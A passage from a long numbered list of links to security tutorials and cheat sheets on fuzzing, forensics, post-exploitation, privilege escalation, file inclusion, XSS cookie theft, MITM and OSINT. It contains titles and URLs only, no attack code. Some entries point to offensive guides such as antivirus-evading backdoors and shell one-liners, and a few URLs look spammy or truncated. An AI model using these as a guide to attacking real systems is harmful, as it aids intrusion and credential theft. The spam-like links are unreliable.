Hunter : https://securitychops.com/2018/05/26/slae-assignment-3-egghunter-shellcode.html -1479-How to: Shellcode to reverse bind a shell with netcat : www.hackerfall.com/story/shellcode-to-reverse-bind-a-shell-with-netcat -1480-Bashing the Bash — Replacing Shell Scripts with Python: https://medium.com/capital-one-tech/bashing-the-bash-replacing-shell-scripts-with-python-d8d201bc0989 -1481-How to See All Devices on Your Network With nmap on Linux: https://www.howtogeek.com/.../how-to-see-all-devices-on-your-network-with-nmap-on-linux -1482-A Complete Guide to Nmap: https://www.edureka.co/blog/nmap-tutorial/ -1483-Nmap from Beginner to Advanced : https://resources.infosecinstitute.com/nmap/ -1484-Using Wireshark: Identifying Hosts and Users: https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/ -1485-tshark tutorial and filter examples: https://hackertarget.com/tshark-tutorial-and-filter-examples/ -1486-Fuzz Testing(Fuzzing) Tutorial: What is, Types, Tools & Example: https://www.guru99.com/fuzz-testing.html -1487-Tutorial: Dumb Fuzzing - Peach Community Edition: community.peachfuzzer.com/v3/TutorialDumbFuzzing.html -1488-HowTo: ExploitDev Fuzzing: https://hansesecure.de/2018/03/howto-exploitdev-fuzzing/ -1489-Fuzzing with Metasploit: https://www.corelan.be/?s=fuzzing -1490-Fuzzing – how to find bugs automagically using AFL: 9livesdata.com/fuzzing-how-to-find-bugs-automagically-using-afl/ -1491-Introduction to File Format Fuzzing & Exploitation: https://medium.com/@DanielC7/introduction-to-file-format-fuzzing-exploitation-922143ab2ab3 -1492-0x3 Python Tutorial: Fuzzer: https://www.primalsecurity.net/0x3-python-tutorial-fuzzer/ -1493-Hunting For Bugs With AFL: https://research.aurainfosec.io/hunting-for-bugs-101/ -1494-Fuzzing: The New Unit Testing: https://www.slideshare.net/DmitryVyukov/fuzzing-the-new-unit-testing -1495-Fuzzing With Peach Framework: https://www.terminatio.org/fuzzing-peach-framework-full-tutorial-download/ -1496-How we found a tcpdump vulnerability using cloud fuzzing: https://www.softscheck.com/en/identifying-security-vulnerabilities-with-cloud-fuzzing/ -1497-Finding a Fuzzer: Peach Fuzzer vs. Sulley: https://medium.com/@jtpereyda/finding-a-fuzzer-peach-fuzzer-vs-sulley-1fcd6baebfd4 -1498-Android malware analysis: https://www.slideshare.net/rossja/android-malware-analysis-71109948 -1499-15+ Malware Analysis Tools & Techniques : https://www.template.net/business/tools/malware-analysis/ -1500-30 Online Malware Analysis Sandboxes / Static Analyzers: https://medium.com/@su13ym4n/15-online-sandboxes-for-malware-analysis-f8885ecb8a35 -1501-Linux Command Line Forensics and Intrusion Detection Cheat Sheet: https://www.sandflysecurity.com/blog/compromised-linux-cheat-sheet/ -1502-Cheat Sheets - SANS Digital Forensics: https://digital-forensics.sans.org/community/cheat-sheets -1503-Breach detection with Linux filesystem forensics: https://opensource.com/article/18/4/linux-filesystem-forensics -1504-Digital Forensics Cheat Sheets Collection : https://neverendingsecurity.wordpress.com/digital-forensics-cheat-sheets-collection/ -1505-Security Incident Survey Cheat Sheet for Server Administrators: https://zeltser.com/security-incident-survey-cheat-sheet/ -1506-Digital forensics: A cheat sheet : https://www.techrepublic.com/article/digital-forensics-the-smart-persons-guide/ -1507-Windows Registry Forensics using 'RegRipper' Command-Line on Linux: https://www.pinterest.cl/pin/794815034207804059/ -1508-Windows IR Live Forensics Cheat Sheet: https://www.cheatography.com/koriley/cheat-sheets/windows-ir-live-forensics/ -1509-10 Best Known Forensics Tools That Works on Linux: https://linoxide.com/linux-how-to/forensics-tools-linux/ -1510-Top 20 Free Digital Forensic Investigation Tools for SysAdmins: https://techtalk.gfi.com/top-20-free-digital-forensic-investigation-tools-for-sysadmins/ -1511-Windows Volatile Memory Acquisition & Forensics 2018: https://medium.com/@lucideus/windows-volatile-memory-acquisition-forensics-2018-lucideus-forensics-3f297d0e5bfd -1512-PowerShell Cheat Sheet : https://www.digitalforensics.com/blog/powershell-cheat-sheet-2/ -1513-Forensic Artifacts: evidences of program execution on Windows systems: https://www.andreafortuna.org/forensic-artifacts-evidences-of-program-execution-on-windows-systems -1514-How to install a CPU?: https://www.computer-hardware-explained.com/how-to-install-a-cpu.html -1515-How To Upgrade and Install a New CPU or Motherboard: https://www.howtogeek.com/.../how-to-upgrade-and-install-a-new-cpu-or-motherboard-or-both -1516-Installing and Troubleshooting CPUs: www.pearsonitcertification.com/articles/article.aspx?p=1681054&seqNum=2 -1517-15 FREE Pastebin Alternatives You Can Use Right Away: https://www.rootreport.com/pastebin-alternatives/ -1518-Basic computer troubleshooting steps: https://www.computerhope.com/basic.htm -1519-18 Best Websites to Learn Computer Troubleshooting and Tech support: http://transcosmos.co.uk/best-websites-to-learn-computer-troubleshooting-and-tech-support -1520-Post Exploitation with PowerShell Empire 2.3.0 : https://www.yeahhub.com/post-exploitation-powershell-empire-2-3-0-detailed-tutorial/ -1521-Windows Persistence with PowerShell Empire : https://www.hackingarticles.in/windows-persistence-with-powershell-empire/ -1522-powershell-empire-tutorials-empire-to-meterpreter-shellcode-injection-ssl-tutorial: https://www.dudeworks.com/powershell-empire-tutorials-empire-to-meterpreter-shellcode-injection-ssl-tutorial -1523-Bypassing Anti-Virtus & Hacking Windows 10 Using Empire : https://zsecurity.org/bypassing-anti-virtus-hacking-windows-10-using-empire/ -1524-Hacking with Empire – PowerShell Post-Exploitation Agent : https://www.prodefence.org/hacking-with-empire-powershell-post-exploitation-agent/ -1525-Hacking Windows Active Directory Full guide: www.kalitut.com/hacking-windows-active-directory-full.html -1526-PowerShell Empire for Post-Exploitation: https://www.hackingloops.com/powershell-empire/ -1527-Generate A One-Liner – Welcome To LinuxPhilosophy!: linuxphilosophy.com/rtfm/more/empire/generate-a-one-liner/ -1528-CrackMapExec - Ultimate Guide: https://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec/ -1529-PowerShell Logging and Security: https://www.secjuice.com/enterprise-powershell-protection-logging/ -1530-Create your own FUD Backdoors with Empire: http://blog.extremehacking.org/blog/2016/08/25/create-fud-backdoors-empire/ -1531-PowerShell Empire Complete Tutorial For Beginners: https://video.hacking.reviews/2019/06/powershell-empire-complete-tutorial-for.html -1532-Bash Bunny: Windows Remote Shell using Metasploit & PowerShell: https://cyberarms.wordpress.com/.../bash-bunny-windows-remote-shell-using-metasploit-powershell -1533-Kerberoasting - Stealing Service Account Credentials: https://www.scip.ch/en/?labs.20181011 -1534-Automating Mimikatz with Empire and DeathStar : https://blog.stealthbits.com/automating-mimikatz-with-empire-and-deathstar/ -1535-Windows oneliners to get shell : https://ironhackers.es/en/cheatsheet/comandos-en-windows-para-obtener-shell/ -1536-ObfuscatedEmpire : https://cobbr.io/ObfuscatedEmpire.html -1537-Pentesting with PowerShell in six steps: https://periciacomputacional.com/pentesting-with-powershell-in-six-steps/ -1538-Using Credentials to Own Windows Boxes - Part 3 (WMI and WinRM): https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm -1539-PowerShell Security Best Practices: https://www.digitalshadows.com/blog-and-research/powershell-security-best-practices/ -1540-You can detect PowerShell attacks: https://www.slideshare.net/Hackerhurricane/you-can-detect-powershell-attacks -1541-Detecting and Preventing PowerShell Attacks: https://www.eventsentry.com/.../powershell-pw3rh311-detecting-preventing-powershell-attacks -1542-Detecting Offensive PowerShell Attack Tools – Active Directory Security: https://adsecurity.org/?p=2604 -1543-An Internal Pentest Audit Against Active Directory: https://www.exploit-db.com/docs/46019 -1544-A complete Active Directory Penetration Testing Checklist : https://gbhackers.com/active-directory-penetration-testing-checklist/ -1545-Active Directory | Penetration Testing Lab: https://pentestlab.blog/tag/active-directory/ -1546-Building and Attacking an Active Directory lab with PowerShell : https://1337red.wordpress.com/building-and-attacking-an-active-directory-lab-with-powershell -1547-Penetration Testing in Windows Server Active Directory using Metasploit: https://www.hackingarticles.in/penetration-testing-windows-server-active-directory-using-metasploit-part-1 -1548-Red Team Penetration Testing – Going All the Way (Part 2 of 3) : https://www.anitian.com/red-team-testing-going-all-the-way-part2/ -1549-Penetration Testing Active Directory, Part II: https://www.jishuwen.com/d/2Mtq -1550-Gaining Domain Admin from Outside Active Directory: https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html -1551-Post Exploitation Cheat Sheet: https://0xsecurity.com/blog/some-hacking-techniques/post-exploitation-cheat-sheet -1552-Windows post-exploitation : https://github.com/emilyanncr/Windows-Post-Exploitation -1553-OSCP - Windows Post Exploitation : https://hackingandsecurity.blogspot.com/2017/9/oscp-windows-post-exploitation.html -1554-Windows Post-Exploitation Command List: http://pentest.tonyng.net/windows-post-exploitation-command-list/ -1555-Windows Post-Exploitation Command List: http://tim3warri0r.blogspot.com/2012/09/windows-post-exploitation-command-list.html -1556-Linux Post-Exploitation · OSCP - Useful Resources: https://backdoorshell.gitbooks.io/oscp-useful-links/content/linux-post-exploitation.html -1557-Pentesting Cheatsheet: https://anhtai.me/pentesting-cheatsheet/ -1558-Pentesting Cheatsheets - Red Teaming Experiments: https://ired.team/offensive-security-experiments/offensive-security-cheetsheets -1559-OSCP Goldmine: http://0xc0ffee.io/blog/OSCP-Goldmine -1560-Linux Post Exploitation Cheat Sheet: http://red-orbita.com/?p=8455 -1562-OSCP useful resources and tools: https://acknak.fr/en/articles/oscp-tools/ -1563-Windows Post-Exploitation Command List : https://es.scribd.com/document/100182787/Windows-Post-Exploitation-Command-List -1564-Metasploit Cheat Sheet: https://pentesttools.net/metasploit-cheat-sheet/ -1565-Windows Privilege Escalation: https://awansec.com/windows-priv-esc.html -1566-Linux Unix Bsd Post Exploitation: https://attackerkb.com/Unix/LinuxUnixBSD_Post_Exploitation -1567-Privilege Escalation & Post-Exploitation: https://movaxbx.ru/2018/09/16/privilege-escalation-post-exploitation/ -1568-Metasploit Cheat Sheet: https://vk-intel.org/2016/12/28/metasploit-cheat-sheet/ -1569-Metasploit Cheat Sheet : https://nitesculucian.github.io/2018/12/01/metasploit-cheat-sheet/ -1570-Privilege escalation: Linux: https://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux -1571-Cheat Sheets — Amethyst Security: https://www.ssddcyber.com/cheatsheets -1572-Responder - CheatSheet: https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/ -1573-Cheatsheets: https://h4ck.co/wp-content/uploads/2018/06/cheatsheet.txt -1574-Are you ready for OSCP?: https://www.hacktoday.io/t/are-you-ready-for-oscp/59 -1575-Windows Privilege Escalation: https://labs.p64cyber.com/windows-privilege-escalation/ -1576-A guide to Linux Privilege Escalation: https://payatu.com/guide-linux-privilege-escalation/ -1577-Windows Post-Exploitation-Cheat-Sheet: http://pentestpanther.com/2019/07/01/windows-post-exploitation-cheat-sheet/ -1578-Windows Privilege Escalation (privesc) Resources: https://www.willchatham.com/security/windows-privilege-escalation-privesc-resources/ -1579-Dissecting Mobile Malware: https://slideplayer.com/slide/3434519/ -1580-Android malware analysis with Radare: Dissecting the Triada Trojan: www.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triad/ -1581-Dissecting Mobile Native Code Packers: https://blog.zimperium.com/dissecting-mobile-native-code-packers-case-study/ -1582-What is Mobile Malware? Defined, Explained, and Explored: https://www.forcepoint.com/cyber-edu/mobile-malware -1583-Malware Development — Professionalization of an Ancient Art: https://medium.com/scip/malware-development-professionalization-of-an-ancient-art-4dfb3f10f34b -1584-Weaponizing Malware Code Sharing with Cythereal MAGIC: https://medium.com/@arun_73782/cythereal-magic-e68b0c943b1d -1585-Web App Pentest Cheat Sheet: https://medium.com/@muratkaraoz/web-app-pentest-cheat-sheet-c17394af773 -1586-The USB Threat is [Still] Real — Pentest Tools for Sysadmins, Continued: https://medium.com/@jeremy.trinka/the-usb-threat-is-still-real-pentest-tools-for-sysadmins-continued-88560af447bf -1587-How to Run An External Pentest: https://medium.com/@_jayhill/how-to-run-an-external-pentest-dd76ed14bb6a -1588-Advice for new pentesters: https://medium.com/@PentesterLab/advice-for-new-pentesters-a5f7d75a3aea -1589-NodeJS Application Pentest Tips: https://medium.com/bugbountywriteup/nodejs-application-pentest-tips-improper-uri-handling-in-express-390b3a07cb3e -1590-How to combine Pentesting with Automation to improve your security: https://medium.com/how-to-combine-pentest-with-automation-to-improve-your-security -1591-Day 79: FTP Pentest Guide: https://medium.com/@int0x33/day-79-ftp-pentest-guide-5106967bd50a -1592-SigintOS: A Wireless Pentest Distro Review: https://medium.com/@tomac/sigintos-a-wireless-pentest-distro-review-a7ea93ee8f8b -1593-Conducting an IoT Pentest : https://medium.com/p/6fa573ac6668?source=user_profile... -1594-Efficient way to pentest Android Chat Applications: https://medium.com/android-tamer/efficient-way-to-pentest-android-chat-applications-46221d8a040f -1595-APT2 - Automated PenTest Toolkit : https://medium.com/media/f1cf43d92a17d5c4c6e2e572133bfeed/href -1596-Pentest Tools and Distros: https://medium.com/hacker-toolbelt/pentest-tools-and-distros-9d738d83f82d -1597-Keeping notes during a pentest/security assessment/code review: https://blog.pentesterlab.com/keeping-notes-during-a-pentest-security-assessment-code-review-7e6db8091a66?gi=4c290731e24b -1598-An intro to pentesting an Android phone: https://medium.com/@tnvo/an-intro-to-pentesting-an-android-phone-464ec4860f39 -1599-The Penetration Testing Report: https://medium.com/@mtrdesign/the-penetration-testing-report-38a0a0b25cf2 -1600-VA vs Pentest: https://medium.com/@play.threepetsirikul/va-vs-pentest-cybersecurity-2a17250d5e03 -1601-Pentest: Hacking WPA2 WiFi using Aircrack on Kali Linux: https://medium.com/@digitalmunition/pentest-hacking-wpa2-wifi-using-aircrack-on-kali-linux-99519fee946f -1602-Pentesting Ethereum dApps: https://medium.com/@brandonarvanaghi/pentesting-ethereum-dapps-2a84c8dfee19 -1603-Android pentest lab in a nutshell : https://medium.com/@dortz/android-pentest-lab-in-a-nutshell-ee60be8638d3 -1604-Pentest Magazine: Web Scraping with Python : https://medium.com/@heavenraiza/web-scraping-with-python-170145fd90d3 -1605-Pentesting iOS apps without jailbreak: https://medium.com/securing/pentesting-ios-apps-without-jailbreak-91809d23f64e -1606-OSCP/Pen Testing Resources: https://medium.com/@sdgeek/oscp-pen-testing-resources-271e9e570d45 -1607-Web Application Security & Bug Bounty (Methodology, Reconnaissance, Vulnerabilities, Reporting): https://blog.usejournal.com/web-application-security-bug-bounty-methodology-reconnaissance-vulnerabilities-reporting-635073cddcf2?gi=4a578db171dc -1608-Local File Inclusion (LFI) — Web Application Penetration Testing: https://medium.com/@Aptive/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601 -1609-Local File Inclusion (Basic): https://medium.com/@kamransaifullah786/local-file-inclusion-basic-242669a7af3 -1610-PHP File Inclusion Vulnerability: https://www.immuniweb.com/vulnerability/php-file-inclusion.html -1611-Local File Inclusion: https://teambi0s.gitlab.io/bi0s-wiki/web/lfi/ -1612-Web Application Penetration Testing: Local File Inclusion: https://hakin9.org/web-application-penetration-testing-local-file-inclusion-lfi-testing/ -1613-From Local File Inclusion to Code Execution : https://resources.infosecinstitute.com/local-file-inclusion-code-execution/ -1614-RFI / LFI: https://security.radware.com/ddos-knowledge-center/DDoSPedia/rfi-lfi/ -1615-From Local File Inclusion to Remote Code Execution - Part 2: https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-2 -1616-Local File Inclusion: https://xapax.gitbooks.io/security/content/local_file_inclusion.html -1617-Beginner Guide to File Inclusion Attack (LFI/RFI) : https://www.hackingarticles.in/beginner-guide-file-inclusion-attack-lfirfi/ -1618-LFI / RFI: https://secf00tprint.github.io/blog/payload-tester/lfirfi/en -1619-LFI and RFI Attacks - All You Need to Know: https://www.getastra.com/blog/your-guide-to-defending-against-lfi-and-rfi-attacks/ -1620-Log Poisoning - LFI to RCE : http://liberty-shell.com/sec/2018/05/19/poisoning/ -1621-LFI: https://www.slideshare.net/cyber-punk/lfi-63050678 -1622-Hand Guide To Local File Inclusion(LFI): www.securityidiots.com/Web-Pentest/LFI/guide-to-lfi.html -1623-Local File Inclusion (LFI) - Cheat Sheet: https://ironhackers.es/herramientas/lfi-cheat-sheet/ -1624-Web Application Penetration Testing Local File Inclusion (LFI): https://www.cnblogs.com/Primzahl/p/6258149.html -1625-File Inclusion Vulnerability Prevention: https://www.pivotpointsecurity.com/blog/file-inclusion-vulnerabilities/ -1626-The Most In-depth Hacker's Guide: https://books.google.com/books?isbn=1329727681 -1627-Hacking Essentials: The Beginner's Guide To Ethical Hacking: https://books.google.com/books?id=e6CHDwAAQBAJ -1628-Web App Hacking, Part 11: Local File Inclusion: https://www.hackers-arise.com/.../Web-App-Hacking-Part-11-Local-File-Inclusion-LFI -1629-Local and remote file inclusion : https://vulp3cula.gitbook.io/hackers-grimoire/exploitation/web-application/lfi-rfi -1630-Upgrade from LFI to RCE via PHP Sessions : https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/ -1631-CVV #1: Local File Inclusion: https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a -1632-(PDF) Cross Site Scripting (XSS) in Action: https://www.researchgate.net/publication/241757130_Cross_Site_Scripting_XSS_in_Action -1633-XSS exploitation part 1: www.securityidiots.com/Web-Pentest/XSS/xss-exploitation-series-part-1.html -1634-Weaponizing self-xss: https://silentbreaksecurity.com/weaponizing-self-xss/ -1635-Cookie Tracking and Stealing using Cross-Site Scripting: https://www.geeksforgeeks.org/cookie-tracking-stealing-using-cross-site-scripting/ -1636-Defense against the Black Arts: https://books.google.com/books?isbn=1439821224 -1637-CSRF Attacks: Anatomy, Prevention, and XSRF Tokens: https://www.acunetix.com/websitesecurity/csrf-attacks/ -1638-Bypassing CSRF protection: https://www.bugbountynotes.com/training/tutorial?id=5 -1639-Stealing CSRF tokens with XSS: https://digi.ninja/blog/xss_steal_csrf_token.php -1640-Same Origin Policy and ways to Bypass: https://medium.com/@minosagap/same-origin-policy-and-ways-to-bypass-250effdc4a12 -1641-Bypassing Same Origin Policy : https://resources.infosecinstitute.com/bypassing-same-origin-policy-sop/ -1642-Client-Side Attack - an overview : https://www.sciencedirect.com/topics/computer-science/client-side-attack -1643-Client-Side Injection Attacks: https://blog.alertlogic.com/blog/client-side-injection-attacks/ -1645-The Client-Side Battle Against JavaScript Attacks Is Already Here: https://medium.com/swlh/the-client-side-battle-against-javascript-attacks-is-already-here-656f3602c1f2 -1646-Why Let’s Encrypt is a really, really, really bad idea: https://medium.com/swlh/why-lets-encrypt-is-a-really-really-really-bad-idea-d69308887801 -1647-Huge Guide to Client-Side Attacks: https://www.notion.so/d382649cfebd4c5da202677b6cad1d40 -1648-OSCP Prep – Episode 11: Client Side Attacks: https://kentosec.com/2018/09/02/oscp-prep-episode-11-client-side-attacks/ -1649-Client side attack - AV Evasion: https://rafalharazinski.gitbook.io/security/oscp/untitled-1/client-side-attack -1650-Client-Side Attack With Metasploit (Part 4): https://thehiddenwiki.pw/blog/2018/07/23/client-side-attack-metasploit/ -1651-Ransomware: Latest Developments and How to Defend Against Them: https://www.recordedfuture.com/latest-ransomware-attacks/ -1652-Cookie Tracking and Stealing using Cross-Site Scripting: https://www.geeksforgeeks.org/cookie-tracking-stealing-using-cross-site-scripting/ -1653-How to Write an XSS Cookie Stealer in JavaScript to Steal Passwords: https://null-byte.wonderhowto.com/.../write-xss-cookie-stealer-javascript-steal-passwords-0180833 -1654-How I was able to steal cookies via stored XSS in one of the famous e-commerce site: https://medium.com/@bhavarth33/how-i-was-able-to-steal-cookies-via-stored-xss-in-one-of-the-famous-e-commerce-site-3de8ab94437d -1655-Steal victim's cookie using Cross Site Scripting (XSS) : https://securityonline.info/steal-victims-cookie-using-cross-site-scripting-xss/ -1656-Remote Code Execution — Damn Vulnerable Web Application(DVWA) - Medium level security: https://medium.com/@mikewaals/remote-code-execution-damn-vulnerable-web-application-dvwa-medium-level-security-ca283cda3e86 -1657-Remote Command Execution: https://hacksland.net/remote-command-execution/ -1658-DevOops — An XML External Entity (XXE) HackTheBox Walkthrough: https://medium.com/bugbountywriteup/devoops-an-xml-external-entity-xxe-hackthebox-walkthrough-fb5ba03aaaa2 -1659-XML External Entity - Beyond /etc/passwd (For Fun & Profit): https://www.blackhillsinfosec.com/xml-external-entity-beyond-etcpasswd-fun-profit/ -1660-XXE - ZeroSec - Adventures In Information Security: https://blog.zsec.uk/out-of-band-xxe-2/ -1661-Exploitation: XML External Entity (XXE) Injection: https://depthsecurity.com/blog/exploitation-xml-external-entity-xxe-injection -1662-Hack The Box: DevOops: https://redteamtutorials.com/2018/11/11/hack-the-box-devoops/ -1663-Web Application Penetration Testing Notes: https://techvomit.net/web-application-penetration-testing-notes/ -1664-WriteUp – Aragog (HackTheBox) : https://ironhackers.es/en/writeups/writeup-aragog-hackthebox/ -1665-Linux Privilege Escalation Using PATH Variable: https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/ -1666-Linux Privilege Escalation via Automated Script : https://www.hackingarticles.in/linux-privilege-escalation-via-automated-script/ -1667-Privilege Escalation - Linux : https://chryzsh.gitbooks.io/pentestbook/privilege_escalation_-_linux.html -1668-Linux Privilege Escalation: https://percussiveelbow.github.io/linux-privesc/ -1669-Perform Local Privilege Escalation Using a Linux Kernel Exploit : https://null-byte.wonderhowto.com/how-to/perform-local-privilege-escalation-using-linux-kernel-exploit-0186317/ -1670-Linux Privilege Escalation With Kernel Exploit: https://www.yeahhub.com/linux-privilege-escalation-with-kernel-exploit-8572-c/ -1671-Reach the root! How to gain privileges in Linux: https://hackmag.com/security/reach-the-root/ -1672-Enumeration for Linux Privilege Escalation: https://0x00sec.org/t/enumeration-for-linux-privilege-escalation/1959 -1673-Linux Privilege Escalation Scripts : https://netsec.ws/?p=309 -1674-Understanding Privilege Escalation: www.admin-magazine.com/Articles/Understanding-Privilege-Escalation -1675-Toppo:1 | Vulnhub Walkthrough: https://medium.com/egghunter/toppo-1-vulnhub-walkthrough-c5f05358cf7d -1676-Privilege Escalation resources: https://forum.hackthebox.eu/discussion/1243/privilege-escalation-resources -1678-OSCP Notes – Privilege Escalation (Linux): https://securism.wordpress.com/oscp-notes-privilege-escalation-linux/ -1679-Udev Exploit Allows Local Privilege Escalation : www.madirish.net/370 -1680-Understanding Linux Privilege Escalation and Defending Against It: https://linux-audit.com/understanding-linux-privilege-escalation-and-defending-againt-it -1681-Windows Privilege Escalation Using PowerShell: https://hacknpentest.com/windows-privilege-escalation-using-powershell/ -1682-Privilege Escalation | Azeria Labs: https://azeria-labs.com/privilege-escalation/ -1683-Abusing SUDO (Linux Privilege Escalation): https://touhidshaikh.com/blog/?p=790 -1684-Privilege Escalation - Linux: https://mysecurityjournal.blogspot.com/p/privilege-escalation-linux.html -1685-0day Linux Escalation Privilege Exploit Collection : https://blog.spentera.id/0day-linux-escalation-privilege-exploit-collection/ -1686-Linux for Pentester: cp Privilege Escalation : https://hackin.co/articles/linux-for-pentester-cp-privilege-escalation.html -1687-Practical Privilege Escalation Using Meterpreter: https://ethicalhackingblog.com/practical-privilege-escalation-using-meterpreter/ -1688-dirty_sock: Linux Privilege Escalation (via snapd): https://www.redpacketsecurity.com/dirty_sock-linux-privilege-escalation-via-snapd/ -1689-Linux privilege escalation: https://jok3rsecurity.com/linux-privilege-escalation/ -1690-The Complete Meterpreter Guide | Privilege Escalation & Clearing Tracks: https://hsploit.com/the-complete-meterpreter-guide-privilege-escalation-clearing-tracks/ -1691-How to prepare for PWK/OSCP, a noob-friendly guide: https://www.abatchy.com/2017/03/how-to-prepare-for-pwkoscp-noob -1692-Basic Linux privilege escalation by kernel exploits: https://greysec.net/showthread.php?tid=1355 -1693-Linux mount without root : epaymentamerica.com/tozkwje/xlvkawj2.php?trjsef=linux-mount-without-root -1694-Linux Privilege Escalation Oscp: www.condadorealty.com/2h442/linux-privilege-escalation-oscp.html -1695-Privilege Escalation Attack Tutorial: https://alhilalgroup.info/photography/privilege-escalation-attack-tutorial -1696-Oscp Bethany Privilege Escalation: https://ilustrado.com.br/i8v7/7ogf.php?veac=oscp-bethany-privilege-escalation -1697-Hacking a Website and Gaining Root Access using Dirty COW Exploit: https://ethicalhackers.club/hacking-website-gaining-root-access-using-dirtycow-exploit/ -1698-Privilege Escalation - Linux · Total OSCP Guide: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html -1699-Linux advanced privilege escalation: https://www.slideshare.net/JameelNabbo/linux-advanced-privilege-escalation -1700-Local Linux privilege escalation overview: https://myexperiments.io/linux-privilege-escalation.html -1701-Windows Privilege Escalation Scripts & Techniques : https://medium.com/@rahmatnurfauzi/windows-privilege-escalation-scripts-techniques-30fa37bd194 -1702-Penetration Testing: Maintaining Access: https://resources.infosecinstitute.com/penetration-testing-maintaining-access/ -1703-Kali Linux Maintaining Access : https://www.tutorialspoint.com/kali_linux/kali_linux_maintaining_access.htm -1704-Best Open Source Tools for Maintaining Access & Tunneling: https://n0where.net/maintaining-access -1705-Maintaining Access Part 1: Introduction and Metasploit Example: https://www.hackingloops.com/maintaining-access-metasploit/ -1706-Maintaining Access - Ethical hacking and penetration testing: https://miloserdov.org/?cat=143 -1707-Maintaining Access with Web Backdoors [Weevely]: https://www.yeahhub.com/maintaining-access-web-backdoors-weevely/ -1708-Best Open Source MITM Tools: Sniffing & Spoofing: https://n0where.net/mitm-tools -1709-Cain and Abel - Man in the Middle (MITM) Attack Tool Explained: https://cybersguards.com/cain-and-abel-man-in-the-middle-mitm-attack-tool-explained/ -1710-Man In The Middle Attack (MITM): https://medium.com/@nancyjohn.../man-in-the-middle-attack-mitm-114b53b2d987 -1711-Real-World Man-in-the-Middle (MITM) Attack : https://ieeexplore.ieee.org/document/8500082 -1712-The Ultimate Guide to Man in the Middle Attacks : https://doubleoctopus.com/blog/the-ultimate-guide-to-man-in-the-middle-mitm-attacks-and-how-to-prevent-them/ -1713-How to Conduct ARP Spoofing for MITM Attacks: https://tutorialedge.net/security/arp-spoofing-for-mitm-attack-tutorial/ -1714-How To Do A Man-in-the-Middle Attack Using ARP Spoofing & Poisoning: https://medium.com/secjuice/man-in-the-middle-attack-using-arp-spoofing-fa13af4f4633 -1715-Ettercap and middle-attacks tutorial : https://pentestmag.com/ettercap-tutorial-for-windows/ -1716-How To Setup A Man In The Middle Attack Using ARP Poisoning: https://online-it.nu/how-to-setup-a-man-in-the-middle-attack-using-arp-poisoning/ -1717-Intro to Wireshark and Man in the Middle Attacks: https://www.commonlounge.com/discussion/2627e25558924f3fbb6e03f8f912a12d -1718-MiTM Attack with Ettercap: https://www.hackers-arise.com/single-post/2017/08/28/MiTM-Attack-with-Ettercap -1719-Man in the Middle Attack with Websploit Framework: https://www.yeahhub.com/man-middle-attack-websploit-framework/ -1720-SSH MitM Downgrade : https://sites.google.com/site/clickdeathsquad/Home/cds-ssh-mitmdowngrade -1721-How to use Netcat for Listening, Banner Grabbing and Transferring Files: https://www.yeahhub.com/use-netcat-listening-banner-grabbing-transferring-files/ -1722-Powershell port scanner and banner grabber: https://www.linkedin.com/pulse/powershell-port-scanner-banner-grabber-jeremy-martin/ -1723-What is banner grabbing attack: https://rxkjftu.ga/sport/what-is-banner-grabbing-attack.php -1724-Network penetration testing: https://guif.re/networkpentest -1725-NMAP Cheatsheet: https://redteamtutorials.com/2018/10/14/nmap-cheatsheet/ -1726-How To Scan a Network With Nmap: https://online-it.nu/how-to-scan-a-network-with-nmap/ -1727-Hacking Metasploitable : Scanning and Banner grabbing: https://hackercool.com/2015/11/hacking-metasploitable-scanning-banner-grabbing/ -1728-Penetration Testing of an FTP Server: https://shahmeeramir.com/penetration-testing-of-an-ftp-server-19afe538be4b -1729-Nmap Usage & Cheet-Sheet: https://aerroweb.wordpress.com/2018/03/14/namp-cheat-sheet/ -1730-Discovering SSH Host Keys with NMAP: https://mwhubbard.blogspot.com/2015/03/discovering-ssh-host-keys-with-nmap.html -1731-Banner Grabbing using Nmap & NetCat - Detailed Explanation: https://techincidents.com/banner-grabbing-using-nmap-netcat -1732-Nmap – (Vulnerability Discovery): https://crazybulletctfwriteups.wordpress.com/2015/09/5/nmap-vulnerability-discovery/ -1733-Penetration Testing on MYSQL (Port 3306): https://www.hackingarticles.in/penetration-testing-on-mysql-port-3306/ -1774-Password Spraying - Infosec Resources : https://resources.infosecinstitute.com/password-spraying/ -1775-Password Spraying- Common mistakes and how to avoid them: https://medium.com/@adam.toscher/password-spraying-common-mistakes-and-how-to-avoid-them-3fd16b1a352b -1776-Password Spraying Tutorial: https://attack.stealthbits.com/password-spraying-tutorial-defense -1777-password spraying Archives: https://www.blackhillsinfosec.com/tag/password-spraying/ -1778-The 21 Best Email Finding Tools:: https://beamery.com/blog/find-email-addresses -1779-OSINT Primer: People (Part 2): https://0xpatrik.com/osint-people/ -1780-Discovering Hidden Email Gateways with OSINT Techniques: https://blog.ironbastion.com.au/discovering-hidden-email-servers-with-osint-part-2/ -1781-Top 20 Data Reconnaissance and Intel Gathering Tools : https://securitytrails.com/blog/top-20-intel-tools -1782-101+ OSINT Resources for Investigators [2019]: https://i-sight.com/resources/101-osint-resources-for-investigators/ -1783-Digging Through Someones Past Using OSINT: https://nullsweep.com/digging-through-someones-past-using-osint/ -1784-Gathering Open Source Intelligence: https://posts.specterops.io/gathering-open-source-intelligence-bee58de48e05 -1785-How to Locate the Person Behind an Email Address: https://www.sourcecon.com/how-to-locate-the-person-behind-an-email-address/ -1786-Find hacked email addresses and check breach mails: https://www.securitynewspaper.com/2019/01/16/find-hacked-email-addresses/ -1787-A Pentester's Guide - Part 3 (OSINT, Breach Dumps, & Password : https://delta.navisec.io/osint-for-pentesters-part-3-password-spraying-methodology/ -1788-Top 10 OSINT Tools/Sources for Security Folks: www.snoopysecurity.github.io/osint/2018/08/02/10_OSINT_for_security_folks.html -1789-Top 5 Open Source OSINT Tools for a 